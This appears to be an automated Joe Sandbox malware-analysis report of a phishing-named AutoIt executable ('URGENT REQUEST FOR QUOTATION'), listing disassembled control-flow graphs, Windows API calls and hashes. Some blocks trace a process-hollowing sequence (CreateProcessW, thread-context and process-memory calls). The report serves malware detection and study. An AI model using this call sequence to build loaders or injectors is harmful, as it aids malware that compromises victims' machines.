                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                                                                      • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                                      • API String ID: 98802146-2727554177
                                                                                                                      • Opcode ID: f5cce6a34ed2c706eadbf9f1a1be1c723942753bd3ec5e1676f6029d6332ea16
                                                                                                                      • Instruction ID: ce9a0307795971130691f30337513ce75d2081fc503c0219f6739acdb91eba59
                                                                                                                      • Opcode Fuzzy Hash: f5cce6a34ed2c706eadbf9f1a1be1c723942753bd3ec5e1676f6029d6332ea16
                                                                                                                      • Instruction Fuzzy Hash: 4071D4715043019ED305EF65DC85DAFB7E8FF89340F40482EF5899B1A2EBB49A88CB52

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00032B8E
                                                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00032B9D
                                                                                                                      • LoadIconW.USER32(00000063), ref: 00032BB3
                                                                                                                      • LoadIconW.USER32(000000A4), ref: 00032BC5
                                                                                                                      • LoadIconW.USER32(000000A2), ref: 00032BD7
                                                                                                                      • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00032BEF
                                                                                                                      • RegisterClassExW.USER32(?), ref: 00032C40
                                                                                                                        • Part of subcall function 00032CD4: GetSysColorBrush.USER32(0000000F), ref: 00032D07
                                                                                                                        • Part of subcall function 00032CD4: RegisterClassExW.USER32(00000030), ref: 00032D31
                                                                                                                        • Part of subcall function 00032CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00032D42
                                                                                                                        • Part of subcall function 00032CD4: InitCommonControlsEx.COMCTL32(?), ref: 00032D5F
                                                                                                                        • Part of subcall function 00032CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00032D6F
                                                                                                                        • Part of subcall function 00032CD4: LoadIconW.USER32(000000A9), ref: 00032D85
                                                                                                                        • Part of subcall function 00032CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00032D94
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                      • String ID: #$0$AutoIt v3
                                                                                                                      • API String ID: 423443420-4155596026
                                                                                                                      • Opcode ID: 03e5510eb6c2ab133b740f23610c8b17c7556e3263f66d1543759a03a4e249da
                                                                                                                      • Instruction ID: bb108381398789bc5f55446103ec3de5fbed9f83fab81ddc65a00a6f0bd037f6
                                                                                                                      • Opcode Fuzzy Hash: 03e5510eb6c2ab133b740f23610c8b17c7556e3263f66d1543759a03a4e249da
                                                                                                                      • Instruction Fuzzy Hash: D9211A70E10314BBEB109FA5EC59EA97FF4FB48B60F04011AF544AAAA0D7F94580DF90

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 443 33170-33185 444 33187-3318a 443->444 445 331e5-331e7 443->445 447 331eb 444->447 448 3318c-33193 444->448 445->444 446 331e9 445->446 449 331d0-331d8 DefWindowProcW 446->449 450 331f1-331f6 447->450 451 72dfb-72e23 call 318e2 call 4e499 447->451 452 33265-3326d PostQuitMessage 448->452 453 33199-3319e 448->453 460 331de-331e4 449->460 455 331f8-331fb 450->455 456 3321d-33244 SetTimer RegisterWindowMessageW 450->456 489 72e28-72e2f 451->489 454 33219-3321b 452->454 458 331a4-331a8 453->458 459 72e7c-72e90 call 9bf30 453->459 454->460 461 33201-33214 KillTimer call 330f2 call 33c50 455->461 462 72d9c-72d9f 455->462 456->454 464 33246-33251 CreatePopupMenu 456->464 465 331ae-331b3 458->465 466 72e68-72e72 call 9c161 458->466 459->454 484 72e96 459->484 461->454 468 72dd7-72df6 MoveWindow 462->468 469 72da1-72da5 462->469 464->454 473 72e4d-72e54 465->473 474 331b9-331be 465->474 480 72e77 466->480 468->454 476 72da7-72daa 469->476 477 72dc6-72dd2 SetFocus 469->477 473->449 478 72e5a-72e63 call 90ad7 473->478 482 33253-33263 call 3326f 474->482 483 331c4-331ca 474->483 476->483 485 72db0-72dc1 call 318e2 476->485 477->454 478->449 480->454 482->454 483->449 483->489 484->449 485->454 489->449 493 72e35-72e48 call 330f2 call 33837 489->493 493->449
                                                                                                                      APIs
                                                                                                                      • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,0003316A,?,?), ref: 000331D8
                                                                                                                      • KillTimer.USER32(?,00000001,?,?,?,?,?,0003316A,?,?), ref: 00033204
                                                                                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00033227
                                                                                                                      • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,0003316A,?,?), ref: 00033232
                                                                                                                      • CreatePopupMenu.USER32 ref: 00033246
                                                                                                                      • PostQuitMessage.USER32(00000000), ref: 00033267
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                      • String ID: TaskbarCreated
                                                                                                                      • API String ID: 129472671-2362178303
                                                                                                                      • Opcode ID: 4f4ec26e9ac723c8c1f40054f52f35a46890ea123d2cc3691c349aeb248f9f21
                                                                                                                      • Instruction ID: db750c1197e4bf579c0d9d6f71e4ec79259d06a7072dcb1c3a4ded07151caa17
                                                                                                                      • Opcode Fuzzy Hash: 4f4ec26e9ac723c8c1f40054f52f35a46890ea123d2cc3691c349aeb248f9f21
                                                                                                                      • Instruction Fuzzy Hash: 3C417B31604200BBEB361B78DD8DFBE3A9DF705314F044125F94A9A5E2CBBC8E8097A5

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 499 1b64f08-1b64fb6 call 1b62948 502 1b64fbd-1b64fe3 call 1b65e18 CreateFileW 499->502 505 1b64fe5 502->505 506 1b64fea-1b64ffa 502->506 507 1b65135-1b65139 505->507 513 1b65001-1b6501b VirtualAlloc 506->513 514 1b64ffc 506->514 509 1b6517b-1b6517e 507->509 510 1b6513b-1b6513f 507->510 515 1b65181-1b65188 509->515 511 1b65141-1b65144 510->511 512 1b6514b-1b6514f 510->512 511->512 516 1b65151-1b6515b 512->516 517 1b6515f-1b65163 512->517 518 1b65022-1b65039 ReadFile 513->518 519 1b6501d 513->519 514->507 520 1b651dd-1b651f2 515->520 521 1b6518a-1b65195 515->521 516->517 524 1b65165-1b6516f 517->524 525 1b65173 517->525 526 1b65040-1b65080 VirtualAlloc 518->526 527 1b6503b 518->527 519->507 522 1b651f4-1b651ff VirtualFree 520->522 523 1b65202-1b6520a 520->523 528 1b65197 521->528 529 1b65199-1b651a5 521->529 522->523 524->525 525->509 530 1b65087-1b650a2 call 1b66068 526->530 531 1b65082 526->531 527->507 528->520 532 1b651a7-1b651b7 529->532 533 1b651b9-1b651c5 529->533 539 1b650ad-1b650b7 530->539 531->507 534 1b651db 532->534 535 1b651c7-1b651d0 533->535 536 1b651d2-1b651d8 533->536 534->515 535->534 536->534 540 1b650ea-1b650fe call 1b65e78 539->540 541 1b650b9-1b650e8 call 1b66068 539->541 547 1b65102-1b65106 540->547 548 1b65100 540->548 541->539 549 1b65112-1b65116 547->549 550 1b65108-1b6510c CloseHandle 547->550 548->507 551 1b65126-1b6512f 549->551 552 1b65118-1b65123 VirtualFree 549->552 550->549 551->502 551->507 552->551
                                                                                                                      APIs
                                                                                                                      • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 01B64FD9
                                                                                                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 01B651FF
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1794132776.0000000001B62000.00000040.00000020.00020000.00000000.sdmp, Offset: 01B62000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_1b62000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateFileFreeVirtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 204039940-0
                                                                                                                      • Opcode ID: ed516440ab75e0c1ded8a7b1870b24392b753ad5cf7d4aa929dd61e32643855c
                                                                                                                      • Instruction ID: 366ce88f008282bfc659b058df7ac2469ec2b59ab0ea783e1d62bbe051cc89d9
                                                                                                                      • Opcode Fuzzy Hash: ed516440ab75e0c1ded8a7b1870b24392b753ad5cf7d4aa929dd61e32643855c
                                                                                                                      • Instruction Fuzzy Hash: 3DA10970E00209EBDB28CF95C894BEEBBB9FF58704F208199E511BB281D7799A51CF50

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 563 32c63-32cd3 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                      APIs
                                                                                                                      • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00032C91
                                                                                                                      • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00032CB2
                                                                                                                      • ShowWindow.USER32(00000000,?,?,?,?,?,?,00031CAD,?), ref: 00032CC6
                                                                                                                      • ShowWindow.USER32(00000000,?,?,?,?,?,?,00031CAD,?), ref: 00032CCF
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$CreateShow
                                                                                                                      • String ID: AutoIt v3$edit
                                                                                                                      • API String ID: 1584632944-3779509399
                                                                                                                      • Opcode ID: 78c5d2abaf06eaf68bb65a583cfa2785917e04fcd31451cca0bc2177e9b5d0fd
                                                                                                                      • Instruction ID: 6845dfbea31787348dc91c0bdc516c72a14f93ceb97e91f6744dcaeced51df53
                                                                                                                      • Opcode Fuzzy Hash: 78c5d2abaf06eaf68bb65a583cfa2785917e04fcd31451cca0bc2177e9b5d0fd
                                                                                                                      • Instruction Fuzzy Hash: F4F0DA755403907AFB311717AC0CE773EBDE7C6F60B00105EF944AA9A0C6B91891DAB0

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 678 1b64cf8-1b64e09 call 1b62948 call 1b64be8 CreateFileW 685 1b64e10-1b64e20 678->685 686 1b64e0b 678->686 689 1b64e27-1b64e41 VirtualAlloc 685->689 690 1b64e22 685->690 687 1b64ec0-1b64ec5 686->687 691 1b64e45-1b64e5c ReadFile 689->691 692 1b64e43 689->692 690->687 693 1b64e60-1b64e9a call 1b64c28 call 1b63be8 691->693 694 1b64e5e 691->694 692->687 699 1b64eb6-1b64ebe ExitProcess 693->699 700 1b64e9c-1b64eb1 call 1b64c78 693->700 694->687 699->687 700->699
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 01B64BE8: Sleep.KERNELBASE(000001F4), ref: 01B64BF9
                                                                                                                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 01B64DFF
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1794132776.0000000001B62000.00000040.00000020.00020000.00000000.sdmp, Offset: 01B62000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_1b62000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateFileSleep
                                                                                                                      • String ID: QM2LB5X1F1K3BP
                                                                                                                      • API String ID: 2694422964-1161565470
                                                                                                                      • Opcode ID: c548e70d25f50950ba78a37ae7a6639573c0e1adb6e32bb3c49a132b894305d2
                                                                                                                      • Instruction ID: 6774bdd50f52fb92e2ea5da25cbb72be9facc6bed83fa3744c7180f4a18f1b5e
                                                                                                                      • Opcode Fuzzy Hash: c548e70d25f50950ba78a37ae7a6639573c0e1adb6e32bb3c49a132b894305d2
                                                                                                                      • Instruction Fuzzy Hash: 6C519171D04249EAEF15DBE4C844BEFBBB9AF59300F004199E608BB2C0D7B95B45CBA5

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 738 33b1c-33b27 739 33b99-33b9b 738->739 740 33b29-33b2e 738->740 741 33b8c-33b8f 739->741 740->739 742 33b30-33b48 RegOpenKeyExW 740->742 742->739 743 33b4a-33b69 RegQueryValueExW 742->743 744 33b80-33b8b RegCloseKey 743->744 745 33b6b-33b76 743->745 744->741 746 33b90-33b97 745->746 747 33b78-33b7a 745->747 748 33b7e 746->748 747->748 748->744
                                                                                                                      APIs
                                                                                                                      • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00033B0F,SwapMouseButtons,00000004,?), ref: 00033B40
                                                                                                                      • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00033B0F,SwapMouseButtons,00000004,?), ref: 00033B61
                                                                                                                      • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00033B0F,SwapMouseButtons,00000004,?), ref: 00033B83
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseOpenQueryValue
                                                                                                                      • String ID: Control Panel\Mouse
                                                                                                                      • API String ID: 3677997916-824357125
                                                                                                                      • Opcode ID: 3f5404f8c4f530ba5e77353ebea98b95d2b9230cbaf638e4313cfb4b4b22c779
                                                                                                                      • Instruction ID: bb1aa22a2cd16c450adb9287a077885d5099cc7f7ab5b7ab6c21787d93d3e2bc
                                                                                                                      • Opcode Fuzzy Hash: 3f5404f8c4f530ba5e77353ebea98b95d2b9230cbaf638e4313cfb4b4b22c779
                                                                                                                      • Instruction Fuzzy Hash: AD112AB5510208FFEB618FA5DC84EAEB7BCEF44744F104459EA05D7110D3319E409760

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 749 1b63be8-1b63c88 call 1b66048 * 3 756 1b63c9f 749->756 757 1b63c8a-1b63c94 749->757 758 1b63ca6-1b63caf 756->758 757->756 759 1b63c96-1b63c9d 757->759 760 1b63cb6-1b64368 758->760 759->758 761 1b6436a-1b6436e 760->761 762 1b6437b-1b643a8 CreateProcessW 760->762 763 1b643b4-1b643e1 761->763 764 1b64370-1b64374 761->764 769 1b643b2 762->769 770 1b643aa-1b643ad 762->770 785 1b643e3-1b643e6 763->785 786 1b643eb 763->786 765 1b64376 764->765 766 1b643ed-1b6441a 764->766 768 1b64424-1b6443e Wow64GetThreadContext 765->768 766->768 787 1b6441c-1b6441f 766->787 772 1b64445-1b64460 ReadProcessMemory 768->772 773 1b64440 768->773 769->768 774 1b647a9-1b647ab 770->774 776 1b64467-1b64470 772->776 777 1b64462 772->777 778 1b64752-1b64756 773->778 781 1b64472-1b64481 776->781 782 1b64499-1b644b8 call 1b656c8 776->782 777->778 783 1b647a7 778->783 784 1b64758-1b6475c 778->784 781->782 788 1b64483-1b64492 call 1b65618 781->788 800 1b644bf-1b644e2 call 1b65808 782->800 801 1b644ba 782->801 783->774 789 1b64771-1b64775 784->789 790 1b6475e-1b6476a 784->790 785->774 786->768 787->768 787->774 788->782 805 1b64494 788->805 793 1b64777-1b6477a 789->793 794 1b64781-1b64785 789->794 790->789 793->794 796 1b64787-1b6478a 794->796 797 1b64791-1b64795 794->797 796->797 803 1b64797-1b6479d call 1b65618 797->803 804 1b647a2-1b647a5 797->804 808 1b644e4-1b644eb 800->808 809 1b6452c-1b6454d call 1b65808 800->809 801->778 803->804 804->774 805->778 810 1b64527 808->810 811 1b644ed-1b6451e call 1b65808 808->811 816 1b64554-1b64572 call 1b66068 809->816 817 1b6454f 809->817 810->778 818 1b64525 811->818 819 1b64520 811->819 822 1b6457d-1b64587 816->822 817->778 818->809 819->778 823 1b645bd-1b645c1 822->823 824 1b64589-1b645bb call 1b66068 822->824 826 1b645c7-1b645d7 823->826 827 1b646ac-1b646c9 call 1b65218 823->827 824->822 826->827 830 1b645dd-1b645ed 826->830 834 1b646d0-1b646ef Wow64SetThreadContext 827->834 835 1b646cb 827->835 830->827 833 1b645f3-1b64617 830->833 836 1b6461a-1b6461e 833->836 837 1b646f3-1b646fe call 1b65548 834->837 838 1b646f1 834->838 835->778 836->827 839 1b64624-1b64639 836->839 845 1b64702-1b64706 837->845 846 1b64700 837->846 838->778 841 1b6464d-1b64651 839->841 843 1b64653-1b6465f 841->843 844 1b6468f-1b646a7 841->844 847 1b64661-1b6468b 843->847 848 1b6468d 843->848 844->836 850 1b64712-1b64716 845->850 851 1b64708-1b6470b 845->851 846->778 847->848 848->841 852 1b64722-1b64726 850->852 853 1b64718-1b6471b 850->853 851->850 854 1b64732-1b64736 852->854 855 1b64728-1b6472b 852->855 853->852 856 1b64743-1b6474c 854->856 857 1b64738-1b6473e call 1b65618 854->857 855->854 856->760 856->778 857->856
                                                                                                                      APIs
                                                                                                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 01B643A3
                                                                                                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01B64439
                                                                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01B6445B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1794132776.0000000001B62000.00000040.00000020.00020000.00000000.sdmp, Offset: 01B62000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_1b62000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2438371351-0
                                                                                                                      • Opcode ID: fc310a6135c3389c0587bc6629e9838c2c50d5be0bfc8bfa2df8a04cac11b1e3
                                                                                                                      • Instruction ID: dc25d556d253d2dd301fbc5972792aac9c6b73b42a53a79063ee85fd236ce8cd
                                                                                                                      • Opcode Fuzzy Hash: fc310a6135c3389c0587bc6629e9838c2c50d5be0bfc8bfa2df8a04cac11b1e3
                                                                                                                      • Instruction Fuzzy Hash: 3762FD30A14618DBEB24CFA4C850BDEB775FF68300F1091A9D21DEB290E7799E85CB59
                                                                                                                      Strings
                                                                                                                      • Variable must be of type 'Object'., xrefs: 000832B7
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Variable must be of type 'Object'.
                                                                                                                      • API String ID: 0-109567571
                                                                                                                      • Opcode ID: deb1d99e8ed33023d8c554a2f3d9c485ea38b7b052d11c933000cbe9f8296714
                                                                                                                      • Instruction ID: b70732e3c6c73155f2b5c02d18ff0ccf88ff8bf0f8e541acd94b363d0cad2302
                                                                                                                      • Opcode Fuzzy Hash: deb1d99e8ed33023d8c554a2f3d9c485ea38b7b052d11c933000cbe9f8296714
                                                                                                                      • Instruction Fuzzy Hash: 06C2AC71E00245CFCB25DF98C884AADB7F5BF48700F248269E946AB392D775EE41CB91

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 1369 33923-33939 1370 33a13-33a17 1369->1370 1371 3393f-33954 call 36270 1369->1371 1374 73393-733a2 LoadStringW 1371->1374 1375 3395a-33976 call 36b57 1371->1375 1378 733ad-733b6 1374->1378 1381 733c9-733e5 call 36350 call 33fcf 1375->1381 1382 3397c-33980 1375->1382 1379 33994-33a0e call 52340 call 33a18 call 54983 Shell_NotifyIconW call 3988f 1378->1379 1380 733bc-733c4 call 3a8c7 1378->1380 1379->1370 1380->1379 1381->1379 1395 733eb-73409 call 333c6 call 33fcf call 333c6 1381->1395 1382->1378 1384 33986-3398f call 36350 1382->1384 1384->1379 1395->1379
                                                                                                                      APIs
                                                                                                                      • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 000733A2
                                                                                                                        • Part of subcall function 00036B57: _wcslen.LIBCMT ref: 00036B6A
                                                                                                                      • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00033A04
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: IconLoadNotifyShell_String_wcslen
                                                                                                                      • String ID: Line:
                                                                                                                      • API String ID: 2289894680-1585850449
                                                                                                                      • Opcode ID: 028af89b1ecc6f1d8e2a1d5910f1dcfcc60d09dbe66ac8e35c1700b7a2499530
                                                                                                                      • Instruction ID: 9ef8acbd347189736d6710782c6bfb898bf6c7fb6d57c21a4cd4c96068b0faf3
                                                                                                                      • Opcode Fuzzy Hash: 028af89b1ecc6f1d8e2a1d5910f1dcfcc60d09dbe66ac8e35c1700b7a2499530
                                                                                                                      • Instruction Fuzzy Hash: 0531C271408304AAD326EB20DC85BEFB7DCAB45720F00892EF5D996092DBB49788C7D2
                                                                                                                      APIs
                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00050668
                                                                                                                        • Part of subcall function 000532A4: RaiseException.KERNEL32(?,?,?,0005068A,?,00101444,?,?,?,?,?,?,0005068A,00031129,000F8738,00031129), ref: 00053304
                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00050685
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                      • String ID: Unknown exception
                                                                                                                      • API String ID: 3476068407-410509341
                                                                                                                      • Opcode ID: b4409ccc2c68503764fe6ded738dd13c56cc48f85e12c104f6e2ab8cbf341d24
                                                                                                                      • Instruction ID: 490397f070c6710fc93f0b5b62357c669dbb14332d447795f247fca2d340b7df
                                                                                                                      • Opcode Fuzzy Hash: b4409ccc2c68503764fe6ded738dd13c56cc48f85e12c104f6e2ab8cbf341d24
                                                                                                                      • Instruction Fuzzy Hash: A9F0C23490070EB7CB00BAA4D84ADEF77AD5F00351B604531BD14DA992EF71EA6DC695
                                                                                                                      APIs
                                                                                                                      • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 000B82F5
                                                                                                                      • TerminateProcess.KERNEL32(00000000), ref: 000B82FC
                                                                                                                      • FreeLibrary.KERNEL32(?,?,?,?), ref: 000B84DD
                                                                                                                      Memory Dump Source
